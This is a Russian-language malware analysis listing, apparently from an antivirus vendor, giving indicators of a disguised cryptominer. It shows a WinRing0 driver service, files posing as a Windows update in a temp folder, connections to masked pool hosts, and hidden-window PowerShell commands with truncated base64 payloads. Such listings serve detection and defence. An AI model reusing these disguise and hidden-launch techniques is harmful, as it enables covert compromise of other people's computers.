Техническая информация
- [HKLM\System\CurrentControlSet\Services\WinRing0_1_2_0] 'ImagePath' = '%WINDIR%\temp\SystemUpdate\WinRing0x64.sys'
- 'WinRing0_1_2_0' %WINDIR%\temp\SystemUpdate\WinRing0x64.sys
- <SYSTEM32>\services.exe
- %WINDIR%\temp\systemupdate\winring0x64.sys
- %WINDIR%\temp\systemupdate\config.json
- %WINDIR%\temp\systemupdate\windowsupdate.exe
- '94.##1.9.155':2325
- 'xm##ool.eu':7777
- '94.##1.9.155':2325
- 'xm##ool.eu':7777
- DNS ASK xm##ool.eu
- '%WINDIR%\temp\systemupdate\windowsupdate.exe'
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACc...' (со скрытым окном)
- '%WINDIR%\temp\systemupdate\windowsupdate.exe' ' (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACc...